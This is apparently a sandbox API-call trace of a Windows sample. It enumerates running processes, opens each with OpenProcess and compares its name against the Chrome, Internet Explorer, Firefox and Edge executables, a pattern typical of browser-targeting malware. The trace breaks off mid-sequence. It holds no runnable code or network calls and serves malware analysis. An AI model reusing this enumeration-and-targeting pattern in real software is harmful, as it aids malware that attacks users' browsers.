	[0230.779] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.779] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.779] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.780] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.780] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.780] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.781] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x68dc
	[0230.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.781] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.781] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.781] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.781] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.782] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.782] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.782] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.783] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x68e0
	[0230.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.783] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.783] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.783] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.783] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.784] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.784] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.784] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0230.785] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x68e4
	[0230.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.785] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0230.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.785] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.785] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.785] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0230.786] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.786] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.786] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.787] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x68e8
	[0230.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.787] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.787] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.789] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.789] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.789] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.790] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.790] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.790] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0230.791] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x68ec
	[0230.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.791] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.791] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.791] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.791] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.792] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.792] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.792] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0230.793] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x68f0
	[0230.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.793] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0230.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.793] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.793] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.793] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0230.794] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.794] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.794] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0230.795] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x68f4
	[0230.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.795] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0230.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.795] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.795] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.795] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0230.796] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.796] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.796] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0230.797] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x68f8
	[0230.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.797] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0230.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.797] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.797] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.797] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0230.798] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.798] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.798] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0230.799] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x68fc
	[0230.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.799] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0230.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.799] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.799] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.800] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0230.800] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.800] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.800] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0230.801] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x6900
	[0230.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.801] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0230.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.801] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.801] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.801] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0230.802] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.802] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.802] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0230.805] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x6904
	[0230.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.805] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0230.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.805] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.805] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.805] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0230.806] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.806] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.806] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0230.807] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0230.807] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0230.807] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x6908
	[0230.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.808] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0230.808] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.808] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.809] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0230.809] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.809] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.810] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0230.810] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x690c
	[0230.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.811] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0230.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.811] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.811] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.811] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0230.812] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.812] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.812] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0230.813] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x6910
	[0230.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.813] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0230.813] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.813] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.814] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0230.814] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.814] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.814] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0230.815] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x6914
	[0230.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.815] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0230.815] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.815] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.816] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0230.816] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.816] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.816] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0230.817] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x6918
	[0230.818] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.818] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0230.820] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.820] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.821] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.822] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0230.822] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.822] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.823] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0230.824] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x691c
	[0230.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.824] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0230.824] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.824] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.825] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0230.825] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.825] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.825] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0230.826] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x6920
	[0230.826] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.826] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0230.827] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.827] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.828] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0230.828] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.828] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.829] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0230.830] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6924
	[0230.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.830] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0230.830] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.830] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.831] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.831] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0230.832] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.832] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.832] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0230.833] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6928
	[0230.833] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.834] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0230.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.836] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.836] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.836] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0230.837] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.837] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.837] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0230.838] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x692c
	[0230.838] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.838] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0230.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.839] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.839] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.839] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0230.840] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.840] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.840] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0230.841] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6930
	[0230.841] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.841] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0230.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.842] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.842] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.842] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0230.843] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.843] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.843] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0230.844] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6934
	[0230.844] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.844] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0230.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.845] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.845] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.845] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0230.846] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.846] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0230.847] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0230.847] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6938
	[0230.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.848] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0230.848] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.848] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0230.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0230.849] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0230.849] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
